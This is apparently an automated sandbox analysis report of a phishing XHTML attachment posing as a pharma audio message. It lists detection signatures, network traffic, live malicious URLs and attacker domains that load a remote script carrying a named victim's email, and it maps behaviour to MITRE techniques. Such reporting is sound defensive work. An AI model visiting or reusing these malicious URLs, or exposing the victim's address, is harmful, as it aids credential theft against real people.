Edit tour

Windows Analysis Report
#Ud83d#Udd0aAudio_Msg Pharma.xhtml

Overview

General Information

Sample name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml renamed because original name is a hash value
Original sample name:	Audio_Msg Pharma.xhtml
Analysis ID:	1650495
MD5:	d97e1feefbffc8d82562a10b3dde201b
SHA1:	c97780ed0765a904afbfe0ef8297d1885a8bc0b2
SHA256:	6e3c117ebc04ceda9a13734a6fa6b7258fd6e4da711806b3e7b236a26866f3e2
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML IFrame injector detected

HTML Script injector detected

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#UD83D~1.XHT MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,2843365176371782232,8006201269056333489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com

Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/%23UD83D~1.XHT... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script creates an iframe, loads a remote script from a suspicious domain, and passes the user's email address as a parameter. This behavior is highly suspicious and indicative of a potential phishing or malware attack.

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com

Suspicious Javascript code found in HTML file

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: .location
Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml

HTTP Parser: Base64 decoded: https://office.avcbtech.store/kuk/xls/k1u2k.js

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT

HTTP Parser: <input type="password" .../> found

Source: #Ud83d#Udd0aAudio_Msg Pharma.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23UD83D~1.XHT	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.16:49735 -> 185.174.100.76:8248

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 139.28.36.38 139.28.36.38

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 208.89.73.21
Source: unknown	TCP traffic detected without corresponding DNS query: 208.89.73.21
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: office.avcbtech.store
Source: global traffic	DNS traffic detected: DNS query: sender.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: _8248._https.server1.linxcoded.top
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: chromecache_63.1.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_65.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_65.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.16:49738 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6924_309290121

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6924_309290121

Jump to behavior

Source: classification engine

Classification label: mal80.phis.winXHTML@19/23@18/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#UD83D~1.XHT
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,2843365176371782232,8006201269056333489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,2843365176371782232,8006201269056333489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#Ud83d#Udd0aAudio_Msg Pharma.xhtml	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
file:///C:/Users/user/Desktop/%23UD83D~1.XHT	0%	Avira URL Cloud	safe
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.2.137	true	false	high
s-part-0013.t-0009.t-msedge.net	13.107.246.41	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	high
www.google.com	142.251.40.164	true	false	high
api.ipify.org	104.26.12.205	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	151.101.44.193	true	false	high
i.imgur.com	unknown	unknown	false	high
_8248._https.server1.linxcoded.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://i.imgur.com/0HdPsKK.png	false		high
https://sender.linxcoded.top/start/xls/includes/css6.css	false		high
https://i.imgur.com/KAb5SEy.png	false		high
file:///C:/Users/user/Desktop/%23UD83D~1.XHT	true	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high
https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=michael.masselli@pharma.com	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_65.1.dr	false		high
https://getbootstrap.com)	chromecache_65.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
151.101.44.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
142.251.40.164	www.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.17
192.168.2.16

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1650495
Start date and time:	2025-03-27 19:06:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#Ud83d#Udd0aAudio_Msg Pharma.xhtml renamed because original name is a hash value
Original Sample Name:	Audio_Msg Pharma.xhtml
Detection:	MAL
Classification:	mal80.phis.winXHTML@19/23@18/10
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

